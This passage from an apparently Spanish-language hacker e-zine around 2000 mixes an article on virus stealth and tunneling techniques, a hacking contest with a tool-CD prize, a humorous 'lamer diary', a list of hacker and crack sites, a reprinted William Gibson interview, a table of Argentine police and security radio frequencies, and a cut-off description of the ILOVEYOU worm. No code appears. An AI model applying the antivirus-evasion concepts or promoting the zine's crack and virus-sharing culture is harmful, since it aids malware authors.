al sistema que lo aloja. De hecho, uno de los aspectos por los que
se define un virus es, precisamente, que debe actuar de manera
solapada al sistema y sin que el usuario se de cuenta, para asi
poder desarrollarse y difundirse con facilidad. Para llevar a cabo esta
accion, las nuevas amenazas utilizan distintas tecnicas que han ido
evolucionando en funcion de como las han ido neutralizando los programas
antivirus, ya que, por supuesto, los virus tambien emplean estos
procedimientos para no ser detectados por los antivirus
A continuacion, vamos a ver las maneras mas elementales que los virus
utilizan para ocultarse..
Una de las tecnicas mas conocidas y utilizadas es la denominada "Stealth"
(ocultamiento). La base fundamental de esta tecnica consiste en esconder
aquellas pistas por las que se podria reconocer una infeccion en el sistema
a simple vista. Por ejemplo, cuando un virus infecta un fichero ejecutable
siempre deja indicios de su accion como puedan ser un aumento en el tama¤o
de los ficheros atacados o cambios en la fecha de creacion del fichero.
Para evitar que estos cambios sean evidentes, una tecnica habitualmente
utilizada consiste en interceptar el servicio del sistema que se encarga de
leer los ficheros del disco, de manera que este siempre devuelva el valor
que el fichero infectado tenia antes de ser atacado (fecha o tama¤o
anterior, por ejemplo)
Posteriormente al desarrollo de las tecnicas Stealth y ante la aparicion de
los programas residentes de proteccion, se desarrolla la tecnica conocida
como "Tunneling" o sobrepasamiento.
Los programas residentes de proteccion interceptan los servicios del
sistema para impedir los da¤os que los virus puedan causar. Por ejemplo,
impiden escrituras en los sectores de arranque, que se modifiquen los
programas ejecutables, el formateo de los discos duros, o las escrituras en
areas criticas del disco.
La tecnica del tunneling consiste en obtener las direcciones de memoria
originales de los servicios del sistema, para asi utilizarlos directamente
sin tener que pasar por el filtro del antivirus residente y, por lo tanto,
sin ser interceptados cuando acceden a dichos servicios.
De las tecnicas que hemos visto se deduce la importancia de contar con un
antivirus que utilice la ultima tecnologia en deteccion y desinfeccion de
estas amenazas. Actualmente, la mayoria de los programas antivirus, como
Panda Antivirus Platinum, dedican un gran esfuerzo y recursos humanos en el
estudio y desarrollo de la tecnologia necesaria para hacer frente a todas
estas tecnicas y a otras mas complejas que veremos en una proxima entrega.
Sus dudas o sugerencias a etimegt --->
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Autor: E-guru
E-mail:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Web: www.technohackers.cjb.net
18.CONVERTITE EN REPORTERO
Si te interesa encargarte de alguna de la secciones de la revista o
proponernos una vos, puedes hacerlo enviandonos tus articulos a:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Nosotros veremos tu articulo y las ideas que nos propones.
Si nos agrada tu forma de escribir, (desde ya que no escribiste ganzadas al
mandarnos el articulo) seras el nuevo reportero de la seccion que elegiste.
NOTA: Ser reportero significa que estas obligado a mandar para cada edicion
como minimo 1 articulo.
Si solo deseas que aparesca un articulo escrito por vos y no tener ningun
compromiso con la revista, envianos tu articulo a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
19.CONCURSOS
En esta seccion se haran competencias entre distintas organizaciones con el
fin de hackear algun programa, pagina o alguna otra cosa.
El premio sera un CD que contiene un copilado de programas hackers, crackers,
carding, virus, y un monton de herramientas utiles para cualquier interesado
en explorar el maravilloso mundo del hacking.
Aun no esta preparado el programa que habra que hackear pero tal vez para la
proxima edicion ya vayamos teniendo las bases del concurso.
Las organizaciones de hackers interesadas en inscribirse pueden ir haciendolo
mandandonos un e-mail a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
con sus datos, integrantes,
pais, y todos los datos comunes para un concurso.
Nota: no pongan sus nombres reales, ni sus direcciones. Solo al ganador del
premio se le pedira una direccion o casilla de correo para enviar el premio.
20.AGENDA DE UN LAMER
Estas son las actividades normales que hace un lamer dia a dia.
10/5/2000 Hoy me compraron mi primer ordenador dicen que es un ultimo modelo
creo que es un IBM modelo 254, yo pienso que significa lo siguiente:
IBM = PROCESADOR
MODELO = LA MARCA
254 = LA VELOCIDAD DE RAZONAMIENTO DE LA COMPACTERA.
Que bueno apenas me la compraron y ya se todo esto, soy un master,
tambien me dijeron que tiene una especie de instrumento que permite
comunicarse con gente de otros mundos (y tambien de este). Se llama
moken y todavia no lo probe.
11/5/2000 Hoy un amigo me conto que el tiene uno igual y me explico como
instalarlo. Estuve hablando con una persona de mexico por una
dimencion desconozida llamada IRC.
Tambien me contaron que podes entrar a unas paginas llamadas wes
pero no las probe aun porque tengo miedo a que me contagien un virus
(ya que mi amigo matias tiene un virus por culpa de una foto que
bajo de una wes jachesr.)
Definicion de virus (la escribo para no olvidarmela):
Bicho malvado con alma de destructor que se te mete en la maquina
porque satan lo envia a destruirtela. Puede tener crias (no se
cuantas por parto)(¨como se yo si es macho o hembra?) y contagiar
su alma a otros virus pacificos.
Pueden tomar diferentes formas:
1) exe = se mete dentro de un no se que terminado en exe
2) com = igual que el de antes pero me imagino que debe ser mas
comodo
3) doc = se mete cuando escribis una palabra que a el no le gusta y
entonces se apodera de todos tu amigos.
4) jpg = este es mas malo que los anteriores (me conto roberto)
porque te borra la bios (creo que significa que te borra
el adn.
ADN = BIOS --> Deducion mia ee, creo que cada dia me hago
mas inteligente, tal vez algun dia me convierto en jachesr).
5) mutuaciones = Son mas malvados y te pueden robar tu alma.
Tambien me explico el de la casa de computadoras que existen unos
antivirus (son virus pero buenos(protegen la compu)).
Estos antivirus hay que actualizarlos porque todo los dias nacen
mas bicho. (otra forma de matarlos en con un aerosol.)
12/5/2000 Llame a la casa de computacion que me vendio la maquina y me
dijeron que por entrar a la wes no me puedo contagiar un virus.
Estoy mas tranquilo.
13/5/2000 Hoy por accidente entre a una pagina jachesr y encontre un criadero
de virus donde vos podias elegir uno y bajartelo (me dan
escalofrios con solo pensarlo), estoy pensando en denunciarlos a la
policia porque crian virus.
14/5/2000 NOOOOOOOOOOOOOOOOOO!!!! creo que tengo un virus, hoy me saque nota
baja en el colegio y despues le robe la goma a mi compa¤ero. Porque
hize eso, ¨estare contagiado por algunos de los soldados de satan?
¨Como hago para conectar el antivirus con mi cuerpo para que lo
eche? ¨y se me hecho aerosol en el cuerpo?.
15/5/2000 Tengo una idea y porque no me convierto en jachesr, asi podre entrar
y destruir la nasa.
De ahora en mas soy jachesr y nada mas.
Continuara....
En esta agenda se muestra como un tonto lamer confunde hacker con cracker un
error que por desgracia no solo comete el lamer, si no que tambien lo hacen
los medios de prensa, "yahoo" que confunde hacker como pirata, y ejemplos de
este tipo de ignorancia vemos todos los dias.
"TERRIBLE HACKER PENETRA EN LA PAGINA DEL GOBIERNO Y DESTRUYE VALIOSA
INFORMACION"
HACKER: PERSONA QUE PENETRA EN UN SISTEMA POR EL UNICO HECHO DE APRENDER Y
DESAFIARSE A SI MISMO. AVISA A LOS ENCARGADOS DE SEGURIDAD DE LA
EXISTENCIA DE LA FALLA PARA QUE NINGUN CRACKER SAQUE PROVECHO
DE LA CIRCUNSTANCIA.
CRACKER: PERSONA QUE PENETRA EN UN SISTEMA CON EL FIN DE HACER DA¥O, SE LO
CONFUNDE CON EL TERMINO HACKER NO A MENUDO, SIEMPRE.
LAMER: PERSONA ESTUPIDA INSERVIBLE POR SI MISMA. NO TIENE NINGUN TIPO DE
INTERES SOBRE ESTOS TEMAS, LO UNICO QUE QUIERE ES TENER UN LOGIN
Y UNA CONTRASE¥A PARA IR AL IRC (que por cierto no sabe lo que es)
Y INFECTAR A OTROS CON EL BACKORIFICE Y LUEGO DECIRLE A TODOS SUS
AMIGOS: HOY HE ENTRADO AL ORDENADOR DE UN ESTUPIDO QUE ESTABA EN EL
IRC Y LE HE ABRIDO LA COMPACTERA, SOY UN JACHESR.
NO HAY QUE CONFUNDIR EL TERMINO LAMER CON NEWBIE, ESTE ULTIMO ES EL
QUE RECIEN EMPIEZA, Y NADIE NACE SABIENDO POR LO TANTO TIENE QUE LEER
COMO ESTAS HACIENDO VOS AHORA.
Autor: hackzombi
E-mail:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
21.LAS 10 MEJORES WEB DEL MES
Esta seccion tiene vinculos a las mejores paginas web del mes, para no estar
escribiendo la direccion en el browser utiliza copiar y pegar.
1. WWW.TECHNOHACKER.CJB.NET --> Revista que trata distintos temas del hacking.
RECOMENDADA
2. WWW.AGUJERO.COM --> Revista donde figuran las mejores web.
RECOMENDADA
3. WWW.RINCONDELVAGO.COM --> Pagina dedicada para todos los vagos
4. WWW.AREA54TEAMS.CJB.NET --> Pagina Hacker
RECOMENDADA
5. WWW.POWERHACK.IWARP.COM --> Pagina Hacker
RECOMENDADA
6. WWW.DIGHACK.CJB.NET --> Pagina oficial de la revista (aun en
construccion)
7. WWW.ASTALAVISTA.BOX.SK --> Buscador de cracks
8. WWW.SUPERARCHIVOS.COM --> Download de programas
9. WWW.BRAVENET.COM --> Servicios para Webmasters
10.WWW.SUBDOMINIOS.COM.AR --> Servicio para Webmasters
22.ENTREVISTA A WILLIAM GIBSON
Esta es una entrevista a William Gibson.
Como ya no hay que aclarar este texto no es de totalidad nuestra pero
nos parecio muy importante el incluirlo en la revista porque es de
muy buen pensamiento leerlo .
-----Entrevista a William Gibson-----
--------por Ernesto Priego-----------
--------www.planetax.com.mx----------
-------------------------------------
William Gibson.
Entre limites: De la realidad y el lenguaje.
Ciberespacio: Palabra original de William Gibson
en su novela Neuromante, sobre redes de equipos
informaticos en el cerebro. Esta palabra se utiliza
actualmente para describir la gran cantidad de
recursos e informacion que hay en Internet: "Es una
alucinacion consensual experimentada diariamente
por millones de legitimos operadores en todas las
naciones.Una representacion grafica de informacion
proveniente de todas las computadoras del sistema
humano. Una complejidad inimaginable.",advierte un
programa para ni¤os activado en una escena de la
novela.
Es la hora del crepusculo y salgo por las escaleras
del metro hacia la tarde del lunes. Mientras subo,
un hombre de edad indefinida, con un estamago
sobresaliente que se le escurre sobre las piernas,
la piel del rostro reflejando brillosa el sol
enfermo de alla arriba, muestra una pierna
elefantiasica carcomida por el herpes. La herida, a
flor de piel, tiene el color del agua Clight de
durazno de los anuncios del camion. El sujeto la
expone a mitad del camino, como si quisiese meterle
el pie a la multitud indefinida que se vomita desde
el centro de la tierra y hacia la calle, mientras
con una mano, poblada por un vello oscuro e hirsuto
agita una tasa de color azul. Camino entre
los puestos donde se frien carne de hamburguesa y
salchichas envueltas en tocino, la M enorme de
McDonalds, inmutablemente amarilla, ilumina el
panorama. El fondo es un cielo que se respira
granulado, casi tangible. Una nata de color
indistinto cubre democraticamente a cientos de
Volkswagen de distintos modelos, autos de
procedencia japonesa, un par de BMWs del mismo
color metalico, incluso a aquel Mercedes negro con
la espigada antena en la cajuela posterior. Sigo
caminando, curiosamente (en serio) con la edicion
pocket de Neuromancer, cuando unos gritos en lengua
oriental me obligan a voltear hacia una cortina de
acero que cae, con un ruido oxidado y herrumbroso,
en el pavimento. Un par de muchachas vestidas con
traje de geisha ponen candados a la puerta de metal
que protege su tienda de souvenirs japoneses. El
tamagotchi que uso de llavero empieza a llorar
porque la terca de Jimena se puso necia en
reactivarlo hoy por la mañana. Lo juro. En mi
pantalon, late el cassette que contiene la voz de
William Gibson, y ya quiero llegar a la casa para
prender la computadora y empezar a escribir.
- Para cualquiera que vive en la ciudad de
Mexico leer tus textos es confirmar la realidad..
" Ustedes son mi publico ideal, porque yo
escribo para quien entiende precisamente eso.
El que crea todavia que lo que yo escribo es
ciencia ficcion esta viviendo en el pasado.
Yo funciono en ese espacio en blanco entre las
distintas percepciones de la realidad.
Aunque ya habia estado en Puerto Vallarta antes,
esta es la primera vez que estoy en la ciudad de
Mexico. Yo no habia ido a Japon cuando escribi
Neuromancer...
- Pero,¨y la Zona Rosa? La descripcion que haces en
Virtual Light...
" (interrumpe) De hecho esa descripcion la hice
con la ayuda de un guia de turistas y un monton
de imagenes mentales que yo tenia de aspectos
diferentes de la vida nocturna mexicana que ya
habia yo visto. Fue muy divertido escribir esa
parte.Es dificil errar cuando se trabaja con ese
tipo de material, cuando estas tratando con un
fenomeno global. Si cambias los nombres de las
calles el mismo pasaje podria funcionar igual de
bien para Tokio.Si lo piensas la gente vive todo
el tiempo en una gran zona urbana.
Solo se transfieren de una hacia la otra, pero
nunca experimentan un verdadero shock cultural.
Es lo mismo en cualquier parte del mundo, una
ciudad es como una burbuja de la comunicacion
global. Uno puede volar aqui a Mexico y estar
completamente aislado en un hotel y sentirse
super bien.
- Cuando llegaste a la ciudad en el avion, ¨no
pensaste en la primera linea de Neuromancer, "The
sky above the port was the color of television,
tuned to a dead channel"?
" Claro, usa es una de las razones por las que
queria venir... la ciudad de Mexico aparecera
sin duda en mi proxima novela.Nunca se que es en
lo que va a resultar una de mis novelas.
A veces llego a casa despues de un viaje y
empiezo a escribir y descubro cosas de las que
no me di cuenta cuando las estaba viviendo.
- ¨Lara Croft? ¨Alguna vez pensaste en algo asi?
" Tuve mucha suerte ; cuando empece a escribir
ciencia ficcion ese tipo de tecnologia fue el
material que escogi. Lo veia como la zona donde
el cambio tenia mas probabilidades de emerger.
Vi la tecnologia de ese tiempo y supe que usa era
la direccion que tomaria el mundo, asi que decidi
escribir sobre eso.En gran parte creo que fue una
prediccion afortunada. Las cosas han cambiado en
la misma direccion; no en el mismo modo en que yo
lo habría imaginado, pero ahora veo a Lara Croft
y digo: ¨bueno, yo tenia razon?.
- Se te ha identificado una y otra vez con el llamado
cyberpunk...
"Si. Se me asocio con un grupo de escritores en los
Estados Unidos que fueron etiquetados "cyberpunk"
por los medios de comunicacion.
Nosotros no inventamos la etiqueta. Ni siquiera se
lo que significa "cyberpunk". Pero si se que
puedes ver un video y decir: 'es muy cyberpunk'.
Creo que se trata de un sabor de la cultura. No se
si tenga validez política o sociopolitica ahora o
en el siglo XXI.En realidad no pienso mucho en eso.
- ¨Cual es tu relacion con Brian Eno, con la musica?
"Eno es un amigo y nos econtramos de vez en cuando.
Ultimamente estoy escuchando a lo que llaman en
Estados Unidos "alternative country", que es una
especie de musica country onda Nashville
reinterpretada por un monton de ni¤itos
alternativos. Es muy interesante. En mi nueva
novela se asume que toda la musica pop es musica
country en un modo muy extra¤o...
- ¨Ves en la inteligencia artificial un reto para la
mente humana ?
" No pienso en eso mucho. Sin duda habra
confrontacion. La inteligencia artificial es
inteligencia humana. La distincion que hacemos
entre ambas pronto sera muy arcaica, muy segunda
parte del siglo XX. El conflicto sera mas bien
socioeconomico, porque habra quienes puedan
pagarse un aumento de inteligencia mediante la
tecnologia. Este es el conflicto existente entre
los que pueden tener una computadora y los que no.
Habra confrontacion, pero no como un
'acontecimiento' historico, no como un momento
hollywoodense, en el que todos digan 'Aaaah!'.
Estamos ya en esa confrontacion, cada vez mas y
mas.
- Arthur C. Clarke, Issac Asimov, Ray Bradbury, Philip
K. Dick...
" Ellos son los abuelitos de la ciencia ficcion. Yo
soy de un pueblito en el sur de los Estados Unidos.
Y de ahi viene la ciencia ficcion. Yo vengo de la
ciencia ficcion. Pero no creo hacer lo que ellos
hacian. Y yo se que ellos saben que yo no hago lo
que ellos hacian.
- Ya has mencionado que para ti la tecnologia es
neutral...
" Si. Pero lo que es más importante es que el cambio
se produce mediante la tecnologia, pero no es un
cambio planeado. La legislacion siempre esta
tratando de estar al corriente de los cambios
tecnologicos. No hay manera de volver atras. No
podemos detenernos.Ya saltamos de la cima. Y puede
que no haya fondo.
- ¨Es igual con las drogas, no podemos volver atras,no
podemos detenernos?
" Necesitamos reconocer que el uso de las drogas es
una actividad humana antiquisima. No soy un tipo
simplista pro-drogas. Pero se que lo que estamos
haciendo ahora, la llamada "guerra contra las
drogas", solo alimenta mas y mas el trafico ilegal.
Necesitamos un nuevo paradigma.
- ¨Has pensado en escribir utilizando un software para
hipertexto?
"No he pensado en ello aun.Todavia me gusta escribir
asi, una palabra tras otra. Muy secuencial.
- ¨Y la poesia?
" La poesia es fundamental para mi. En mi vida jamas
me he encontrado con un escritor de ciencia ficcion
que valore la poesia tanto como yo. Para describir
algunos de los estados sobre los que escribo
necesito una prosa que se aproxime a la poesia, una
prosa que se aproxime a los limites del significado,
que es lo que creo que hace la poesia: transgredir
el mismo limite del lenguaje."
Los clicks de la camara de Malena siguen sonando aun
terminada la entrevista. Gibson se levanta, encorbado,
increiblemente delgado, mientras continua tosiendo, y
acepta posar para más fotos para Planeta X y
Rolling Stone.Toma un vaso de agua sin siquiera mirarle
con descuido. William Gibson camina por los pasillos
del Camino Real y tampoco voltea a ver el crater azul
que funciona como mar artificial, sus olas levantandose
cansadas hacia el firmamento de la urbe.
____ __ __ _
/ __ \ ___ / /_ ___ / / (_) ____ ____
/ /_/ // _ \ / __ \/ _ \ / / / / / __ \ / __ \
/ _, _// __// /_/ / __// / / / / /_/ // / / /_
/_/ |_| \___//_.___/\___//_/ /_/ \____//_/ /_/(_)
2000
AVISO:Literary Freeware by Ernesto Priego.
Este articulo fue ralizado sin ningun fin de lucro por
Ernesto Priego y puede ser copiado y distribuido por
cualquier medio siempre y cuando aparesca esta leyenda
en todas y cada una de las copias hechas del mismo.
Homapage: http://rebelion.cjb.net http://planetax.com.mx
e-mail:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
23.RADIOAFICIONADOS: V.H.F.
ESTAS SON ALGUNAS DE LAS FRECUENCIAS DE LA BANDA DE 2 METRO
+---------------------------------+--------------------------------+
| CENTRAL FREQ | CENTRAL FREQ |
---------------------------------+--------------------------------+
| REP.METEO 2,165 |A.C.A 153,055 |
| EMER.MAR. 2,182 |PF SEG FERROVIARIA 153,155 |
| EZEIZA 2,633 |PF JEFATURA 153,235 |
| GB 3,283 |C.I.P.E.C. IN 153,265 |
| ESTADO DE BUQUES 3,861 |A.C.A. 153,395 |
| U.S.A. 3,957 |PF COMANDO 153,475 |
| SE.AT.SUR 4,125 |PF C.P.T. 153,535 |
| SERV.RADIOTELEFONICO 4,395 |C.I.P.E.C. IN 153,625 |
| BRASIL 4,925 |C.I.P.E.C. 153,635 |
| GB 5,905 |PF CUST.PERSONAL 153,755 |
| U.S.A. 5,954 |PF ZONAL 153,775 |
| BRASIL 5,983 |C.I.P.E.C. 153,890 |
| BRASIL 6,002 |SEGBA 153,995 |
| BRASIL 6,020 |GAS DEL ESTADO 154,075 |
| BRASIL 6,086 |PF SEG.FEDERAL 154,135 |
| BRASIL 6,141 |CARBONSEL 154,175 |
| U.S.A. 6,150 |RED HOSPITALARIA 154,195 |
| U.S.A. 6,166 |GOE PROVINCIA 154,315 |
| BRODCASTING 6,167 |REP.FT.+5160 154,335 |
| U.S.A. 6,187 |PREFECTURA NAVAL 154,415 |
| U.S.A. 7,105 |MARINA METEOROLOGICA 154,435 |
| ARABIA 7,110 |PREFECTURA 154,465 |
| BRODCASTING 7,126 |C.R.P.F. FREQ #1 154,615 |
| GB 7,145 |C.R.P.F. FREQ #2 154,675 |
| BRASIL 7,160 |GENDARMERIA 154,690 |
| U.S.A. 7,185 |PF PREVENCION 154,795 |
| U.S.A. 7,228 |APOSTADERO NAVAL 154,895 |
| U.R.S.S 7,240 |BOMBEROS 154,920 |
| U.S.A 7,260 |DESCRIP.DELITOS 154,950 |
| KOREA 7,273 |SEGBA 154,975 |
| U.S.A. 7,291 |HOSPITAL NAVAL 155,015 |
| U.S.A 7,325 |REGIONAL 155,135 |
| WMT TIME 7,335 |PF INVESTIGACIONES 155,155 |
| CHECOSLOVAKIA 7,345 |BOMBEROS NAUTICA 155,175 |
| U.S.A 7,348 |DEFENSA CIVIL S.MARTIN 155,375 |
| U.R.S.S 7,360 |COMI.PART.INT 155,550 |
| U.R.S.S 7,365 |RTTY 155,565 |
| U.R.S.S 7,390 |PF DELEG. SAN MARTIN 155,575 |
| BRODCASTING 7,397 |POL.CAMINERA 155,645 |
| MICROS 7,669 |PRFECTURA NAVAL CMD. 155,675 |
| TX.PACHE 8,235 |C.I.P.E.C. 155,685 |
| RX.PACHE 8,759 |PREFECTRURA NAVAL 155,735 |
| R.TEL USA 8,903 |PF BOMBEROS 155,755 |
| US.REPORT 8,957 |PREFECTURA 155,780 |
| ? 9,362 |EJ.COMUNICADOS 155,815 |
| U.S.A 9,407 |GENDARMERIA 155,835 |
| U.S.A 9,451 |GENDARMERIA 155,935 |
| FRANCIA 9,488 |OPER. LOGISTICA 155,955 |
| ITALIA 9,534 |GENDARMERIA 155,975 |
| U.R.S.S 9,556 |CH. 00 MARINE 156,000 |
| BRASIL 9,567 |CH. 60 MARINE + 4600 156,025 |
| FRANCIA 9,586 |CH. 01 MARINE + 4600 156,050 |
| LATINO 9,614 |CH. 61 MARINE + 4600 156,075 |
| U.S.A 9,636 |CH. 02 MARINE + 4600 156,100 |
| BRODCASTING 9,699 |CH. 62 MARINE + 4600 156,125 |
| ARABIA 9,706 |CH. 03 MARINE + 4600 156,150 |
| FRANCIA 9,710 |CH. 63 MARINE + 4600 156,175 |
| ALEMANIA 9,730 |COM RAD 156,190 |
| ARABIA 9,753 |CH. 04 MARINE + 4600 156,200 |
| ALEMANIA 9,774 |CH. 64 MARINE + 4600 156,225 |
| FRANCIA 9,802 |CH. 05 MARINE + 4600 156,250 |
| FRANCIA 9,858 |CH. 65 MARINE + 4600 156,275 |
| U.R.S.S 9,860 |CH. 06 MARINE 156,300 |
| FRANCIA 9,870 |CH. 66 MARINE + 4600 156,325 |
| GMT TIME 10,000 |CH. 07 MARINE + 4600 156,350 |
| CONTROL AEREO 10,024 |CH. 67 MARINE 156,375 |
| INFO SAT 10,051 |CH. 08 MARINE 156,400 |
| BRODCASTING 11,329 |CH. 68 MARINE 156,425 |
| ARABIA 11,733 |CH. 09 MARINE 156,450 |
| U.R.S.S 11,757 |CH. 69 MARINE 156,475 |
| BBC OF LONDON 11,820 |CH. 10 MARINE 156,500 |
| PRAGA 11,988 |CH. 70 MARINE 156,525 |
| FRANCIA 12,039 |CH. 11 MARINE 156,550 |
| U.R.S.S 12,048 |CH. 71 MARINE 156,575 |
| SIRIA 12,085 |CH. 12 MARINE PREFECT. 156,600 |
| MCBA PAN 12,268 |PREFECTURA 156,620 |
| MARINA 12,389 |CH. 72 MARINE 156,625 |
| BRODCASTING 13,652 |CH. 13 MARINE PREF. CX 156,650 |
| FRANCIA 13,660 |CH. 73 MARINE 156,675 |
| BRODCASTING 13,748 |CH. 14 MARINE PREFECT. 156,700 |
| GMT TIME 15,000 |CH. 74 MARINE 156,725 |
| ALEMANIA 15,195 |CH. 15 MARINE 156,750 |
| JAPON 15,197 |CH. 16 MARINE EMERG. 156,800 |
| U.S.A 15,210 |CH. 17 MARINE 156,850 :
| U.S.A 15,220 |CH. 77 MARINE 156,875 |
| JAPON 15,230 |CH. 18 MARINE + 4600 156,900 |
| GB 15,278 |CH. 78 MARINE + 4600 156,925 |
| U.S.A 15,400 |CH. 19 MARINE + 4600 156,950 |
| ITALIA 15,575 |CH. 79 MARINE + 4600 156,975 |
| U.S.A 17,782 |CH. 20 MARINE + 4600 157,000 |
| CHINA 17,808 |CH. 80 MARINE 157,025 |
| U.S.A 17,825 |CH. 21 MARINE 157,050 |
| JAPON 21,610 |CH. 81 MARINE 157,075 |
| ? 26,575 |CH. 22 MARINE 157,100 |
| CARGA CONTAINERS FM 31,680 |CH. 82 MARINE 157,125 |
| RADIOLLAMADA 35,080 |CH. 23 MARINE + 4600 157,150 |
| ? 35,565 |CH. 83 MARINE 157,175 |
| ? AM 35,935 |CH. 24 MARINE + 4600 157,200 |
| ? FM 36,260 |CH. 84 MARINE + 4600 157,225 |
| RADIOLLAMADA 37,280 |CH. 25 MARINE + 4600 157,250 |
| EMBAJADA U.S.A. 37,500 |CH. 85 MARINE + 4600 157,275 |
| ACA 38,900 |CH. 26 MARINE + 4600 157,300 |
| EMBAJADA JAPON 39,260 |CH. 86 MARINE + 4600 157,325 |
| COMERCAL 39,390 |CH. 27 MARINE + 4600 157,350 |
| EMBAJADA U.S.A. 42,160 |CH. 87 MARINE + 4600 157,375 |
| VIDEO CANAL 2 55,250 |FREQ.GUBERNAMENTAL 157,395 |
| AUDIO CANAL 2 59,750 |CH. 28 MARINE + 4600 157,400 |
| ? FM 60,300 |CH. 88 MARINE + 4600 157,425 |
| VIDEO CANAL 3 61,250 |SIDE 157,475 |
| AUDIO CANAL 3 65,750 |SIDE 157,515 |
| VIDEO CANAL 4 67,250 |SUP.BOMBEROS 157,555 |
| AUDIO CANAL 4 71,750 |SIDE 157,595 |
| VIDEO CANAL 5 77,250 |SIDE 157,695 |
| AUDIO CANAL 5 81,750 |RADIO RIVADAVIA 157,715 |
| VIDEO CANAL 6 83,250 |ENLACE RADIO EL MUNDO 157,750 |
| AUDIO CANAL 6 87,750 |ENLACE RADIO RIVADAVIA 157,795 |
| TWR QUILMES 118,100 |PF MIN.DEL INTERIOR 157,815 |
| TWR MORON 118,500 |SIDE 157,855 |
| TWR PALOMAR 118,900 |CONTROL BASE P.F. 157,955 |
| TWR EZEIZA APROX 119,100 |PF SUB JEFATURA 157,995 |
| TWR AEROPARQUE FINAL 119,500 |SIDE 158,055 |
| TWR MORENO 119,700 |FRQ. COMERCIAL 158,195 |
| TWR EZEIZA FINAL 119,900 |PF COMISARIAS 158,315 |
| CHNL ENC. AERONAVES 120,000 :PF DIGICOM 158,45 |
| TWR MAR DEL PLATA 120,500 |SEGBA 158,495 |
| AERO 120,700 |C.I.P.E.C. 158,615 |
| EMERGENCIA AERO 121,500 |REGIONAL ? 158,655 |
| TWR EZEIZA RODAJE 121,700 |REG. MORON 158,675 |
| TWR AEROPARQUE RODAJE 121,900 |OPERATVO SOL OUT 158,705 |
| INT PF HELICOPTEROS 122,600 |PART.INT P.PROV 158,735 |
| TWR DON TORCUATO 122,800 |REG. LA PLATA 158,795 |
| TWR ISL.DEMARCHI&PF H 123,400 |REG. LA MATANZA 158,875 |
| TWR CAMPO DE MAYO 123,800 |RPT POL. PROV 158,915 |
| BAIRES CONTROL N & S 123,900 |PARTES PROVINCIA 158,935 |
| AEREO 124,100 |REG. LA MATANZA 158,995 |
| BAIRES CONTROL N & S 125,300 | |
| TRANSP. CAMNTRO 125,600 |COMANDO EN JEFE 159,065 |
| ATIS AEROPARQUE 127,600 |REGIONAL SAN MARTIN 159,075 |
| REACTORES MILITARES 130,550 |REG. MORON 159,125 |
| COORD. AERO ARG 131,200 |REGIONAL TIGRE 159,165 |
| AERO 133,755 |COMI.PART.INT 159,275 |
| OPERACIONES PALOMAR 135,400 |REG. TIGRE 159,315 |
| ENLACE RADIO 138,030 |POLI PROV 159,335 |
| EXTERIORES RADIO ? 138,080 |REG. SAN MARTIN OUT 159,365 |
| ENLACE RADIO M 138,170 |REGIONAL 159,375 |
| ENLACE RADIO ? 138,310 |COM RAD 159,425 |
| ENLACE RADIO ? 138,330 |COM RAD 159,455 |
| AGENCIA INV. 138,340 |COMANDO PREFECTURA 159,515 |
| ENLACE RADIO ? 138,410 |DEFENSA CIVIL 159,555 |
| C.N.E.A. 138,920 |POLICIA PROVINCIA 159,665 |
| ENLACE RADIO 139,030 |COMADO ALFA 14 159,675 |
| P.F. 139,065 |OCASA 159,675 |
| C.N.E.A. 139,770 |PF RADIOGONIOMETRIA 159,755 |
| HOSPITAL 139,890 |C.I.P.E.C. -6520 OUT 159,785 |
| C.N.E.A. 140,070 |PF ? 159,915 |
| AMBULANCIA 140,910 |PF BASE TANK 159,965 |
| AG. SEGURIDAD 141,170 |ITALO 160,055 |
| ENLACE RADIO ? 141,510 |C.I.P.E.C. 160,085 |
| ? 141,810 |POLICIA PROVINCIA 160,355 |
| P.F. 141,910 |AMBULACIAS 160,430 |
| ENLACE RADIO ? 142,170 |PF ? 160,475 |
| ENLACE RADIO ? 142,310 |JUNCADELA 161,015 |
| ENLACE RADIO DEL PLATA 142,710 |EMBAJADA U.S.A. 161,215 |
| INFORME AERO AM 142,880 |COMISARIAS 161,335 |
| ENLACE RADIO ? 142,985 |P.A.M.I 161,500 |
| ? 143,175 |RADIO PACHECO 161,850 |
| BOMBEROS 143,595 |RADIO PACHECO 161,955 |
| MONOCANAL TELEF. 143,600 |MANLIBA 162,055 |
| ENACE TORRES EZEIZA 143,700 |RADIO ENLACE BLU 162,515 |
| SHERATON SEGURIDAD 143,990 |COM RAD 162,550 |
| PF VARIAS 152,815 |? 480,575 |
| AUX.MECANICO 152,875 |REPETIDORA 488,750 |
| PF VARIAS 152,995 |RADIO TAXI 503,900 |
+---------------------------------+--------------------------------+
Si tienes informacion relacionada sobre el tema envianosla a:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
24.LA VIRUTECA DE DIGITAL HACKERS
(PARA COLECCIONISTAS DE VIRUS)
En esta seccion se publicara el codigo fuente de algunos virus que andan
circulando en la red con el fin de el estudio de los mismos.
En proximas ediciones empezaremos con una seccion llamada Programacion
de Virus donde se explicara de 0 como operan.
Si sos experto en programacion de virus puedes encargarte de esta seccion
enviandonos un E-mail a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
VIRUS 1 - TOMO I
"ILOVEYOU"
Este virus que les presentamos es el famoso "I love you" que en esta semana
esta haciendo caos en internet. Este gusano esta escrito en Visual Basic
Script y esta infectando a miles de ordenadores a traves del correo
electronico y el IRC. Analizaremos a continuacion ambas formas:
- Mediante correo electronico: Se caracteriza por llegar con con el asunto
"ILOVEYOU" y un fichero adjunto "LOVE-LETTER-FOR-YOU.TXT.VBS
- Por IRC: Para propagarse a traves del IRC utiliza el mirc, si te llega
un fichero llamado LOVE-LETTER-FOR-YOU.htm borralo de inmediato ya que
es el virus.
Si ejecutamos el archivo adjunto el gusano procede a
contagiarnos nuestro sistema y para eso realiza algunas acciones como:
1.Les envia una copia del mensaje a toda nuestros contactos que tengamos en
la agenda del Outlook.
2.Crea las siguientes claves en el registro para que se ejecute
